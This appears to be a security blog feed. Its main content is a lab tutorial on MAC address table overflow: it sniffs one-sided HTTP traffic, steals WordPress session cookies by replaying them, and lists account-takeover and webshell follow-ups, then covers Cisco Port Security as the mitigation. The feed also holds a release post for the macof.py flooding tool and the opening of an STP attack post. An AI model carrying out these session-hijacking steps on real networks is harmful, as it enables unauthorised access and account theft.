<div class="codehilite"><pre><span class="gp">ESW2#</span><span class="k">show</span> mac-address-table count
<span class="go">NM Slot: 1</span>
<span class="go">--------------</span>
<span class="go">Dynamic Address Count: 8188</span>
<span class="go">Secure Address (User-defined) Count: 0</span>
<span class="go">Static Address (User-defined) Count: 0</span>
<span class="go">System Self Address Count: 1</span>
<span class="go">Total MAC addresses: 8189</span>
<span class="go">Maximum MAC addresses: 8192</span>
<span class="gp">ESW2#</span>
</pre></div>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>In practice the <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> table size is capped to 8189 instead of 8192.
This is an implementation issue of Dynamips’ <span class="caps">NM</span>-<span class="caps">16ESW</span> module with no consequence.</p>
</div>
<p>As the attacker, you could also take advantage of the Spanning-Tree protocol
to redesign the topology to make the flooding and data interception even more
efficient.
More information can be found in the <a href="/posts/2017/10/16/spanning-tree-protocol-exploitation/#stp-topology-change" title="STP topology change attack">previous post</a> of this series.</p>
<h4 id="eavesdropping"><a class="toclink" href="#eavesdropping">Eavesdropping</a></h4>
<p>It is now time to fire-up Wireshark.</p>
<p>Before starting the capture, you may want to specify a capture filter:</p>
<ul>
<li>
<p>To ignore the frames crafted to flood the <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> tables.</p>
<p>By default <code>macof.py</code> crafted packets use the broadcast <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> address as
destination, to ignore them use the expression
<code>not ether host ff:ff:ff:ff:ff:ff</code></p>
</li>
<li>
<p>To focus on <span class="caps">HTTP</span> packets.</p>
<p>This is mainly for the lab purposes, as this will make working with
Wireshark easier, particularly on home virtualized environments.
To do this we add <code>and tcp port http</code> to the above expression.</p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>A lot of processing goes in Wireshark’s live packet analysis.</p>
<p>For the sake of the lab, we chose to focus on the packets which we
already know to be the most interesting.
If a processing becomes an issue in real-life situations (Raspberry
anyone?), it is common to dissociate:</p>
<ul>
<li>The data collecting phase, building large <em>.pcap</em> files storing
all sniffed all data with little to no discrimination in raw form.</li>
<li>The data analysis phase, which may occur at a later time and on a
different machine.</li>
</ul>
</div>
</li>
</ul>
<p>This gives the following capture filter:
<code>not ether host ff:ff:ff:ff:ff:ff and tcp port http</code>:</p>
<p><span class="lb-small"><a href="#ws_capture_filter.png" id="ws_capture_filter.png-thumb" title="Click to enlarge"><img alt="Wireshark capture filter" src="https://www.whitewinterwolf.com/posts/2017/10/25/mac-address-table-overflow/ws_capture_filter.png"/></a></span></p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>Don’t confuse Wireshark’s <em>capture</em> and <em>display</em> filters:</p>
<ul>
<li>
<p>The <em>capture</em> filter allow to select the data to capture at an early
stage.
Data not matching the filter is ignored, freeing processing time for
more relevant data which, otherwise, might be loss especially in
case of high load or activity.</p>
</li>
<li>
<p>The <em>display</em> filter, as its name implies, only filters the data
displayed in the <span class="caps">GUI</span>.
Data not matching the filter is still collected and analyzed by the
various Wireshark processors, this filter has no noticeable impact on
Wireshark performances.</p>
</li>
</ul>
</div>
<p>Start the <em>User_1</em> host and access <em>Server_1</em> home page: <em>Server_1</em> replies
should appear in Wireshark window:</p>
<p><span class="lb-small"><a href="#ws_interception.png" id="ws_interception.png-thumb" title="Click to enlarge"><img alt="Wireshark sniffed traffic" src="https://www.whitewinterwolf.com/posts/2017/10/25/mac-address-table-overflow/ws_interception.png"/></a></span></p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>If you don’t capture anything and the <em>User_1</em> host was already running,
close its Firefox for more than 30 seconds then try again: Firefox may have
a background network activity (checking updates and sending usage
statistics) registering <em>User_1</em> <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> address in switches <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> address tables.</p>
<p>For the same reason, in real-life this attack will be the most
efficient after a long period of inactivity where the computer were either
turned-off or in stand-by mode, typically the beginning of the work day
and, to a lesser extend, after the lunch pause.</p>
</div>
<p>As you can see in the screenshot, we have only one side of the communication:
every captured packet go from the server (<em>source = 192.1683.100</em>) to the client
(<em>destination = 192.168.1.101</em>), we did not capture any packet going the other
way around.</p>
<p>This is normal and expected, albeit largely ignored by those limiting
themselves to theoretical approaches of security and thinking that <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> table
overflows somehow magically <em>“turns a switch into a hub”</em> or make it
<em>“fail open in repeating mode”</em>, as it is often described.</p>
<p>This depends on the algorithm implemented in the switch, but on sane and modern
devices the <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> flooding should not be able to overwrite already existing and
legitimate <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> entries (except following an inactivity period longer than the
configured maximum aging-timer, as usual).</p>
<p>Under normal circumstances the default router address is always known to the
switches as nearly all activity on the network involves it.
It is one of the first address learned when the switch is started and is
permanently refreshed.
The addresses that are added and removed from the switch throughout the day are
those of end-nodes, here user’s workstation.</p>
<p>By filling the switches <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> address tables, we prevented the switches from
learning the <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> address of the <em>User_1</em> host, however the address of the
default router <em>R1</em> was already known and will remain known.
The overflow won’t change anything to that.</p>
<p>Because of this:</p>
<ul>
<li>
<p>Packets going from <em>User_1</em> to <em>R1</em> (and then <em>Server_1</em>) are correctly
forwarded by relying on <em>R1</em> <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> address present in the switches <abbr title="Media Access Control"><span class="caps">MAC</span></abbr>
address tables.</p>
</li>
<li>
<p>When reply packets sent by <em>Server_1</em> come through <em>R1</em> and try to reach
<em>User_1</em>, the <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> address of the <em>User_1</em> host is missing in the switches
<abbr title="Media Access Control"><span class="caps">MAC</span></abbr> address table due to our attack and therefore the switch fallback in
broadcasting them.</p>
</li>
</ul>
<p>We can therefore see that this attack has two main limitations:</p>
<ul>
<li>
<p>We may have access to only one side of the communication.</p>
</li>
<li>
<p>This is a eavesdropping attack, not a man-in-the-middle attack: we receive
server answer at the same as the legitimate destination, this attack does
not provide an easy way to alter server’s answers.</p>
</li>
</ul>
<p>Nevertheless, we will see an example how this attack can be still be used with profit.</p>
<h4 id="session-stealing"><a class="toclink" href="#session-stealing">Session stealing</a></h4>
<p>Go back on <em>User_1</em> and access to a management page of the <em>Server_1</em> web
application.
On my side, I will access a Wordpress administration page (for those using the
same appliance as me, click on the Bitnami logo in the bottom-right corner to
get a listing of default credentials and links to available management pages).</p>
<p>On Wireshark, find one of the packets corresponding to the server answer to
the user succcessful authentication, then right-click on it > <em>Follow</em> >
<em><span class="caps">TCP</span> Stream</em>.</p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>You must locate the server’s answer to the user authentication, at it is
at this moment that the server’s reply contains the cookies values.
Other messages from the server won’t contain them, and as you don’t have
access to the data sent by the client you cannot fetch this information
from there too.</p>
<p>In case of doubt, don’t hesitate to do a few attempts by login-off and
login-in the user again, noting each time the number of the last packet
captured by Wireshark.</p>
<p>In real world, you may have dozens of users opening new sessions after an
inactivity time, being able to capture just a few of them might be enough.</p>
</div>
<p>You should obtain the full server answer to the user login process.
While you don’t have user’s password, you still have access to users cookies:</p>
<p><span class="lb-small"><a href="#ws_stream.png" id="ws_stream.png-thumb" title="Click to enlarge"><img alt="Wireshark TCP stream" src="https://www.whitewinterwolf.com/posts/2017/10/25/mac-address-table-overflow/ws_stream.png"/></a></span></p>
<p>Still on the <em>Attacker</em> machine, fire-up a browser, go on <em>Server_1</em>
authentication page (<em>http://192.168.3.100/wp-admin</em> in my case): you are not
authenticated (yet!).</p>
<p>Edit your browser’s cookies and manually add the previously captured cookies as
new cookies.
As mentioned above, on my side I use Cookies Manager+ for this task:</p>
<p><span class="lb-small"><a href="#ff_forge_cookies.png" id="ff_forge_cookies.png-thumb" title="Click to enlarge"><img alt="Forging the cookies on Firefox" src="https://www.whitewinterwolf.com/posts/2017/10/25/mac-address-table-overflow/ff_forge_cookies.png"/></a></span></p>
<p>I added to new cookies, prefixed <em>wordpress_…</em> and <em>wordpress_logged_in_…</em>:</p>
<p><span class="lb-small"><a href="#ff_cookies.png" id="ff_cookies.png-thumb" title="Click to enlarge"><img alt="New cookies" src="https://www.whitewinterwolf.com/posts/2017/10/25/mac-address-table-overflow/ff_cookies.png"/></a></span></p>
<p>Try again to access the authentication <span class="caps">URL</span>: <em>“Welcome!”</em>, you are now
granted access to the administration interface!</p>
<p><span class="lb-small"><a href="#pwned.png" id="pwned.png-thumb" title="Click to enlarge"><img alt="Pwned." src="https://www.whitewinterwolf.com/posts/2017/10/25/mac-address-table-overflow/pwned.png"/></a></span></p>
<h4 id="next-steps"><a class="toclink" href="#next-steps">Next steps</a></h4>
<p>As an attacker, there are several things that you can now do, depending
on what you want to achieve:</p>
<ul>
<li>
<p>Maintain your access:</p>
<ul>
<li>
<p>In its current shape, this access will be available only for as long as
the legitimate user does not close the session by clicking on a
<em>Logout</em> link.
If the user closes his browser without closing the session then you
have this session all for yourself.</p>
</li>
<li>
<p>To steal the account, you can edit user’s settings and change the email
address to an address you control and set a new password of your choosing.</p>
<p>Changing the password here is easy as the previous password is not
asked to set a new one, but would it be the case simply use the
“Lost your password?” link to reset it after having changed the email address.</p>
<p>In this scenario the attacker will usually don’t nitpick but change all
user information (including credit card and phone numbers, postal
addresses, change security question and backup accounts, etc.).
Such information may be indeed used by support teams to check user’s
identity in case of a stolen account claim, altering them may prevent
such recovery to work as demonstrated in the
<a href="https://medium.com/@N/how-i-lost-my-50-000-twitter-username-24eb09e026dd" rel="external" title="How I Lost My $50,000 Twitter Username (Medium)">How I Lost My $50,000 Twitter Username</a> case<sup id="fnref-n_is_stolen"><a class="footnote-ref" href="#fn-n_is_stolen">1</a></sup>.</p>
</li>
<li>
<p>More sneakily, if we are lucky and have any administrative privileges
it may possible to create new accounts or modify the privileges or
credentials of existing accounts (in particular unused ones).</p>
</li>
</ul>
</li>
<li>
<p>Attack the server:</p>
<ul>
<li>
<p>Is there any feature allowing to upload files, if yes does one of them
open the possibility to upload a webshell, in one way or another?</p>
</li>
<li>
<p>Is there any feature allowing to execute a command on the host, such
as maintenance tasks?</p>
</li>
<li>
<p>Is there any feature allowing to input server-side scripting code?</p>
</li>
</ul>
<p>More generally, once the attacker managed to get access to a valid
account on a system, the attack surface usually becomes much wider.</p>
</li>
<li>
<p>Attack other users:</p>
<ul>
<li>
<p>Create new content or modify existing content to include malicious code
and infect other users viewing modified content.</p>
</li>
<li>
<p>Use the newly gained abilities as part of a social engineering attack,
impersonating the legitimate user toward third parties.</p>
</li>
</ul>
</li>
</ul>
<p>Of course, none of these suggestions is exclusive and this list it not restrictive.
A determined attacker will most likely engage through various ways and channels
simultaneously to get the most impact, both technically and psychologically.</p>
<h3 id="mitigation"><a class="toclink" href="#mitigation">Mitigation</a></h3>
<table class="floatright">
<thead>
<tr><th>Lab</th><th>Compatible</th></tr>
</thead>
<tbody>
<tr><td>Dynamips</td><td class="no" title="No"><span class="sr-only">No</span></td></tr>
<tr><td><span class="caps">IOU</span></td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td>Real gear</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
</tbody>
</table>
<p>The mitigation for this attack is to set a limit on the number of devices
expected per port.
On Cisco devices, this is achieved by enabling <a href="https://www.cisco.com/c/en/us/td/docs/switches/lan/catalyst4000/8-2glx/configuration/guide/sec_port.html" rel="external" title="Configuring Port Security (Cisco)">Port Security</a>.</p>
<p>As far as the virtual lab is concerned, while <span class="caps">IOU</span> doesn’t allow to really reproduce
the attack itself, using <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> table overflow tools still allows to increase the
number of entries in its <abbr title="Content Addressable Memory"><span class="caps">CAM</span></abbr>:</p>
<div class="codehilite"><pre><span class="gp">IOU3#</span><span class="k">show</span> mac address-table count vlan <span class="s">1</span>
<span class="go">Mac Entries for Vlan 1:</span>
<span class="go">---------------------------</span>
<span class="hll"><span class="go">Dynamic Address Count : 14604</span>
</span><span class="go">Static Address Count : 0</span>
<span class="go">Total Mac Addresses : 14604</span>
<span class="go">Total Mac Address Space Available: 183046404</span>
<span class="gp">IOU3#</span>
</pre></div>
<p>Port Security must be enabled on a per-port basis on each access layer switches:</p>
<div class="codehilite"><pre><span class="gp">IOU3#</span><span class="k">conf</span> t
<span class="go">Enter configuration commands, one per line. End with CNTL/Z.</span>
<span class="gp">IOU3(config)#</span><span class="k">int</span> range<span class="s"> ethernet 1/0 - 3</span>
<span class="gp">IOU3(config-if-range)#</span><span class="c1">! The port must explicitly be set to access mode.</span>
<span class="hll"><span class="gp">IOU3(config-if-range)#</span><span class="k">switchport</span> mode access
</span><span class="hll"><span class="gp">IOU3(config-if-range)#</span><span class="k">switchport</span> port-security
</span><span class="gp">IOU3(config-if-range)#</span><span class="c1">! By default only 1 MAC address allowed.</span>
<span class="hll"><span class="gp">IOU3(config-if-range)#</span><span class="k">switchport</span> port-security maximum <span class="s">5</span>
</span><span class="gp">IOU3(config-if-range)#</span><span class="nb">end</span>
<span class="gp">IOU3#</span>
<span class="gt">*Oct 22 17:18:18.760: %SYS-5-CONFIG_I: Configured from console by console</span>
<span class="gp">IOU3#</span><span class="k">show</span> port-security
<span class="go">Secure Port MaxSecureAddr CurrentAddr SecurityViolation Security Action</span>
<span class="go"> (Count) (Count) (Count)</span>
<span class="go">---------------------------------------------------------------------------</span>
<span class="go"> Et1/0 5 1 0 Shutdown</span>
<span class="go"> Et1/1 5 0 0 Shutdown</span>
<span class="go"> Et1/2 5 0 0 Shutdown</span>
<span class="go"> Et1/3 5 0 0 Shutdown</span>
<span class="go">---------------------------------------------------------------------------</span>
<span class="go">Total Addresses in System (excluding one mac per port) : 0</span>
<span class="go">Max Addresses limit in System (excluding one mac per port) : 4096</span>
<span class="gp">IOU3#</span>
<span class="gp">IOU3#</span><span class="k">copy</span> running-config startup-config
<span class="go">Destination filename [startup-config]?</span>
<span class="go">Building configuration...</span>
<span class="go">Compressed configuration from 1901 bytes to 1052 bytes[OK]</span>
<span class="gp">IOU3#</span>
</pre></div>
<div class="admonition warning">
<p class="admonition-title">Warning</p>
<p>Port-security default value is very low (one single <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> address allowed per
port).
There are various reasons why more than one address may appear on a port:
presence of an <span class="caps">IP</span> phone in addition to the workstation, the user may be
using virtual machines in bridge mode, the user may use a desktop switch to
share a wired connection with a colleague, etc.</p>
<p>Unless your policy explicitly forbids such situations, you will most likely
want to increase this value.
As long as preventing <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> table flooding is concerned, there is no issue in
setting this value to a few dozen: this will still prevent attackers from
simulating thousands of devices while avoiding false positives and prevent
legitimate users from doing their work.</p>
</div>
<p>Now attempting to run the attack makes the port to be automatically shutdown,
isolating the offender:</p>
<div class="codehilite"><pre><span class="gp">IOU3#</span>
<span class="gt">*Oct 22 17:23:48.769: %PM-4-ERR_DISABLE: psecure-violation error detected on Et1/0, putting Et1/0 in err-disable state</span>
<span class="gp">IOU3#</span>
<span class="gt">*Oct 22 17:23:48.769: %PORT_SECURITY-2-PSECURE_VIOLATION: Security violation occurred, caused by MAC address a8bd.c94b.66e9 on port Ethernet1/0.</span>
<span class="gt">*Oct 22 17:23:49.769: %LINEPROTO-5-UPDOWN: Line protocol on Interface Ethernet1/0, changed state to down</span>
<span class="gp">IOU3#</span>
<span class="gt">*Oct 22 17:23:50.769: %LINK-3-UPDOWN: Interface Ethernet1/0, changed state to down</span>
<span class="gp">IOU3#</span>
<span class="gp">IOU3#</span><span class="k">show</span> interfaces status err-disabled
<span class="go">Port Name Status Reason Err-disabled Vlans</span>
<span class="go">Et1/0 err-disabled psecure-violation</span>
<span class="gp">IOU3#</span>
</pre></div>
<p>The port can be restored manually, the same way as with <a href="/posts/2017/10/16/spanning-tree-protocol-exploitation/#bpdu-guard-access-layer" title="STP vulnerability mitigation: BPDU Guard"><span class="caps">BPDU</span> Guard</a>:</p>
<div class="codehilite"><pre><span class="gp">IOU3#</span><span class="k">conf</span> t
<span class="go">Enter configuration commands, one per line. End with CNTL/Z.</span>
<span class="gp">IOU3(config)#</span><span class="k">int</span><span class="s"> ethernet 1/0</span>
<span class="gp">IOU3(config-if)#</span><span class="k">shutdown</span>
<span class="gp">IOU3(config-if)#</span>
<span class="gt">*Oct 22 17:29:11.885: %LINK-5-CHANGED: Interface Ethernet1/0, changed state to administratively down</span>
<span class="gp">IOU3(config-if)#</span><span class="ow">no </span><span class="k">shutdown</span>
<span class="gp">IOU3(config-if)#</span>
<span class="gt">*Oct 22 17:29:15.077: %LINK-3-UPDOWN: Interface Ethernet1/0, changed state to up</span>
<span class="gt">*Oct 22 17:29:16.077: %LINEPROTO-5-UPDOWN: Line protocol on Interface Ethernet1/0, changed state to up</span>
<span class="gp">IOU3(config-if)#</span><span class="nb">end</span>
<span class="gp">IOU3#</span>
<span class="gt">*Oct 22 17:32:31.808: %SYS-5-CONFIG_I: Configured from console by console</span>
<span class="gp">IOU3#</span>
</pre></div>
<p>And a timer can also be set to enable port auto-recovery:</p>
<div class="codehilite"><pre><span class="gp">IOU3#</span><span class="k">conf</span> t
<span class="go">Enter configuration commands, one per line. End with CNTL/Z.</span>
<span class="hll"><span class="gp">IOU3(config)#</span><span class="k">errdisable</span> recovery cause psecure-violation
</span><span class="gp">IOU3(config)#</span><span class="c1">! By default the timeout is set to 300 seconds (= 5 minutes), to change it:</span>
<span class="hll"><span class="gp">IOU3(config)#</span><span class="k">errdisable</span> recovery interval <span class="s">30</span>
</span><span class="gp">IOU3(config)#</span><span class="nb">end</span>
<span class="gp">IOU3#</span>
<span class="gt">*Oct 22 17:35:13.030: %SYS-5-CONFIG_I: Configured from console by console</span>
<span class="gp">IOU3#</span>
</pre></div>
<p>Now the switch should be able to shutdown the port during the attack, and
restore it afterwards:</p>
<div class="codehilite"><pre><span class="gp">IOU3#</span>
<span class="gt">*Oct 22 17:38:04.009: %PM-4-ERR_DISABLE: psecure-violation error detected on Et1/0, putting Et1/0 in err-disable state</span>
<span class="gp">IOU3#</span>
<span class="gt">*Oct 22 17:38:04.009: %PORT_SECURITY-2-PSECURE_VIOLATION: Security violation occurred, caused by MAC address c049.eef6.3ede on port Ethernet1/0.</span>
<span class="gt">*Oct 22 17:38:05.009: %LINEPROTO-5-UPDOWN: Line protocol on Interface Ethernet1/0, changed state to down</span>
<span class="gp">IOU3#</span>
<span class="gt">*Oct 22 17:38:06.010: %LINK-3-UPDOWN: Interface Ethernet1/0, changed state to down</span>
<span class="gp">IOU3#</span>
<span class="gt">*Oct 22 17:38:34.010: %PM-4-ERR_RECOVER: Attempting to recover from psecure-violation err-disable state on Et1/0</span>
<span class="gp">IOU3#</span>
<span class="gt">*Oct 22 17:38:36.015: %LINK-3-UPDOWN: Interface Ethernet1/0, changed state to up</span>
<span class="gt">*Oct 22 17:38:37.023: %LINEPROTO-5-UPDOWN: Line protocol on Interface Ethernet1/0, changed state to up</span>
<span class="gp">IOU3#</span>
</pre></div>
<p>Here we kept the default action, <code>err-disable</code>, which is the most brutal.
When a Port Security violation occurs, alternative actions can be selected:</p>
<ul>
<li>
<p><code>protect</code> silently drops frames bearing new <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> addresses once the
maximum number of address on this port has been reached, keeping the
port up and the connectivity for already registered <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> addresses.</p>
</li>
<li>
<p><code>restrict</code> does the same thing as <code>protect</code>, but in addition generates
a Syslog messages to notify administrators.</p>
</li>
</ul>
<p>To select the <code>protect</code> mode instead of the default <code>err-disable</code>:</p>
<div class="codehilite"><pre><span class="gp">IOU3(config-if-range)#</span><span class="k">switchport</span> port-security violation protect
<span class="gp">IOU3(config-if-range)#</span>
</pre></div>
<p>Port Security also supports <em>sticky addresses</em>.
This is an intermediary solution between manually hardcoding end-nodes <abbr title="Media Access Control"><span class="caps">MAC</span></abbr>
addresses in the switch configuration and the dynamic process learning
described until now.
Here new addresses up until the maximum allowed become an integral part of the
switch running configuration: aging-time will not erase them, and if the running
configuration is saved as the startup configuration then they will also survive
across switch reboots.</p>
<p>The sticky addresses setting is independent of the violation action setting:</p>
<div class="codehilite"><pre><span class="gp">IOU3(config-if-range)#</span><span class="k">switchport</span> port-security mac-address sticky
<span class="gp">IOU3(config-if-range)#</span>
</pre></div>
<div class="footnote">
<hr/>
<ol>
<li id="fn-n_is_stolen">
<p>Fortunately the story as a good ending and Naoki Hiroshima
managed to get back his <a href="https://twitter.com/N" rel="external" title="Naoki Hiroshima (Twitter)">Twitter account</a>, mainly thanks to
the fluff around this case and having done the headlines on several major
websites.
The whole process however took a full month, with Twitter somewhere in the
middle closing the account and <a href="https://twitter.com/N/status/428751111298621441" rel="external" title="It seems that Twitter simply ignored my claim and let somebody grab @N freely. Seriously? (Naoki Hiroshima Twitter account)">releasing it</a> the wild
for anyone to grab it instead of giving it back to its initial user.
Most users however won’t have the knowledge, time and energy to defend
themselves the way he did. <a class="footnote-backref" href="#fnref-n_is_stolen" title="Jump back to footnote 1 in the text">↩</a></p>
</li>
</ol>
</div>macof.py is now available2017-10-25T00:00:00+02:002017-10-25T00:00:00+02:00WhiteWinterWolftag:www.whitewinterwolf.com,2017-10-25:/posts/2017/10/25/macofpy-is-now-available/<p><code>macof.py</code> is a <span class="caps">MAC</span> address table overflow utility.</p>
<p>The traditional tool for <span class="caps">MAC</span> table overflow attacks is <code>macof</code> from the
<a href="https://www.monkey.org/~dugsong/dsniff/" rel="external" title="dsniff project homepage">dsniff</a> project.
However I was not satisfied with this tool.</p>
<p>In particular:</p>
<ul>
<li>
<p><code>macof</code> has no rate limit mechanism, it sends the packets as fast as the
local <span class="caps">CPU</span> and the network adapter can support it.</p>
<p>This leaves no room for a proper interception of users data.</p>
</li>
<li>
<p>Half of the packets generated by <code>macof</code> <a href="/posts/2016/06/26/how-to-run-a-cam-table-overflow-attack-in-gns3/#using-the-right-tool" title="How to run a CAM table overflow attack in GNS3">violates</a> the Ethernet
protocol by having the multicast bit set on the sender’s <span class="caps">MAC</span> address.</p>
<p>As a result, these packets are considered corrupted and silently dropped by
the first encountered switch.</p>
<p>In other words, half of the packets generated by <code>macof</code> are generated
for nothing.</p>
</li>
<li>
<p><code>macof</code> constantly uses random <span class="caps">MAC</span> addresses for generated packets, meaning
that a given source <span class="caps">MAC</span> address is rarely used more than once.</p>
<p>This means that switches’ <span class="caps">MAC</span> table aging system …</p></li></ul><p><code>macof.py</code> is a <span class="caps">MAC</span> address table overflow utility.</p>
<p>The traditional tool for <span class="caps">MAC</span> table overflow attacks is <code>macof</code> from the
<a href="https://www.monkey.org/~dugsong/dsniff/" rel="external" title="dsniff project homepage">dsniff</a> project.
However I was not satisfied with this tool.</p>
<p>In particular:</p>
<ul>
<li>
<p><code>macof</code> has no rate limit mechanism, it sends the packets as fast as the
local <span class="caps">CPU</span> and the network adapter can support it.</p>
<p>This leaves no room for a proper interception of users data.</p>
</li>
<li>
<p>Half of the packets generated by <code>macof</code> <a href="/posts/2016/06/26/how-to-run-a-cam-table-overflow-attack-in-gns3/#using-the-right-tool" title="How to run a CAM table overflow attack in GNS3">violates</a> the Ethernet
protocol by having the multicast bit set on the sender’s <span class="caps">MAC</span> address.</p>
<p>As a result, these packets are considered corrupted and silently dropped by
the first encountered switch.</p>
<p>In other words, half of the packets generated by <code>macof</code> are generated
for nothing.</p>
</li>
<li>
<p><code>macof</code> constantly uses random <span class="caps">MAC</span> addresses for generated packets, meaning
that a given source <span class="caps">MAC</span> address is rarely used more than once.</p>
<p>This means that switches’ <span class="caps">MAC</span> table aging system will regularly clean the
table from all malicious entries.
Of course, the table will fill up again in a few seconds, but these seconds
may be enough for the switch to learn a few more legitimate addresses.
As a result data destined to these addresses won’t be broad-casted anymore.</p>
<p>In other words the interception process is, here again, unreliable.</p>
</li>
</ul>
<p>Most of these issues are probably due to the fact that this tool is now quite
old and seemingly unmaintained (last update in 2000).</p>
<p>I therefore decided to implement my own version, <code>macof.py</code>, compatible with
most options from dsniff’s <code>macof</code>:</p>
<ul>
<li>
<p><code>macof.py</code> allows to tune the frame emission rate to minimize the impact on
the attacker’s host and the network resources as much as possible.</p>
<p>This offers a more reliable propagation of the forged <span class="caps">MAC</span> addresses
throughout the switched network and a more efficient interception of
broadcast data.</p>
</li>
<li>
<p><code>macof.py</code> sends only valid frames, effectively updating switches <span class="caps">MAC</span>
address tables.</p>
</li>
<li>
<p><code>macof.py</code> first locally pre-generates a certain amount of Ethernet frames,
each with a unique random source <span class="caps">MAC</span> address, and then replays this same
set of frames in loop for all the attack duration.</p>
<p>This effectively simulate genuine devices activity, forcing the switches to
regularly reset the associated aging-timers, keeping their <span class="caps">MAC</span> address
table filled without interruption.</p>
</li>
</ul>
<p>In addition <code>macof.py</code> functionalities can be easily included in larger Python projects.</p>
<h3 id="get-it"><a class="toclink" href="#get-it">Get it</a></h3>
<p><em>macof.py</em> is <a href="https://github.com/WhiteWinterWolf/macof.py" rel="external" title="macof.py page on GitHub">freely available</a> (<span class="caps">GPL</span> v3).</p>
<p>Latest news on the project can be found on the <a href="/tags/macofpy/" title="macof.py project homepage">project’s main page</a>.</p>
<h3 id="install-it"><a class="toclink" href="#install-it">Install it</a></h3>
<p><code>macof.py</code> and its accompanying man page can be installed system-wide using the
following commands:</p>
<div class="codehilite"><pre>install -m 755 -D -t /usr/local/bin ./macof.py
mkdir -p /usr/local/share/man/man1
gzip -c ./macof.py.1 >/usr/local/share/man/man1/macof.py.1.gz
</pre></div>
<h3 id="documentation"><a class="toclink" href="#documentation">Documentation</a></h3>
<ul>
<li>
<p>The <a href="/man/1/macof.py/" title="macof.py(1) man page"><code>macof.py</code>(1) man page</a> describes <code>macof.py</code> usage and options.
It also provides advices and examples covering the most common use-cases.</p>
</li>
<li>
<p>You can also read this <a href="/posts/2017/10/25/mac-address-table-overflow/" title="MAC address table overflow">practical use-case</a>, part of a series
on network layer 2 exploitation and protection.</p>
</li>
</ul>
<h3 id="report-an-issue"><a class="toclink" href="#report-an-issue">Report an issue</a></h3>
<p>Please send bug reports to the <a href="http://github.com/WhiteWinterWolf/macof.py/issues" rel="external" title="macof.py issues (GitHub)">macof.py issues page</a> on GitHub.</p>Spanning Tree Protocol exploitation2017-10-16T00:00:00+02:002017-10-16T00:00:00+02:00WhiteWinterWolftag:www.whitewinterwolf.com,2017-10-16:/posts/2017/10/16/spanning-tree-protocol-exploitation/<p>As we saw in the <a href="/posts/2017/10/12/practical-network-layer-2-exploitation-passive-reconnaissance/#stp-messages" title="Passive reconnaissance: STP messages">previous post</a>, Wireshark revealed us the presence
of <abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> messages.</p>
<p>The Spanning Tree Protocol is used to detect topology loops and build the most
efficient forwarding path between interconnected switches.
Topology loops are not a mistake but a way to add redundancy to a topology.
Would a link break, the <abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> protocol detects it and recalculate a new most
efficient tree.</p>
<p>In sane networks, access ports should not deliver <abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> messages to end-devices,
but this is not the default and, as Wireshark told us, not the case in our lab.
This lets the attacker the possibility to simulate a topology change by sending
maliciously crafted <abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> messages.</p>
<p>For this lab we will need <em>at least</em> the <em>User_1</em> and <em>Server_1</em> devices to be available:</p>
<p><span class="lb-small"><img alt="STP lab topology" src="https://www.whitewinterwolf.com/posts/2017/10/16/spanning-tree-protocol-exploitation/topology.png"/></span></p>
<div class="admonition warning">
<p class="admonition-title">Warning</p>
<p>The support of <abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> in the <abbr title="IOS On Unix"><span class="caps">IOU</span></abbr> images I tested was very buggy, <abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> port
state was ignored and frames systematically …</p></div><p>As we saw in the <a href="/posts/2017/10/12/practical-network-layer-2-exploitation-passive-reconnaissance/#stp-messages" title="Passive reconnaissance: STP messages">previous post</a>, Wireshark revealed us the presence
of <abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> messages.</p>
<p>The Spanning Tree Protocol is used to detect topology loops and build the most
efficient forwarding path between interconnected switches.
Topology loops are not a mistake but a way to add redundancy to a topology.
Would a link break, the <abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> protocol detects it and recalculate a new most
efficient tree.</p>
<p>In sane networks, access ports should not deliver <abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> messages to end-devices,
but this is not the default and, as Wireshark told us, not the case in our lab.
This lets the attacker the possibility to simulate a topology change by sending
maliciously crafted <abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> messages.</p>
<p>For this lab we will need <em>at least</em> the <em>User_1</em> and <em>Server_1</em> devices to be available:</p>
<p><span class="lb-small"><a href="#topology.png" id="topology.png-thumb" title="Click to enlarge"><img alt="STP lab topology" src="https://www.whitewinterwolf.com/posts/2017/10/16/spanning-tree-protocol-exploitation/topology.png"/></a></span></p>
<div class="admonition warning">
<p class="admonition-title">Warning</p>
<p>The support of <abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> in the <abbr title="IOS On Unix"><span class="caps">IOU</span></abbr> images I tested was very buggy, <abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> port
state was ignored and frames systematically forwarded, resulting in
broadcast storms in case of topology loops.</p>
<p>Due to this the topology must be modified (removal of the direct link
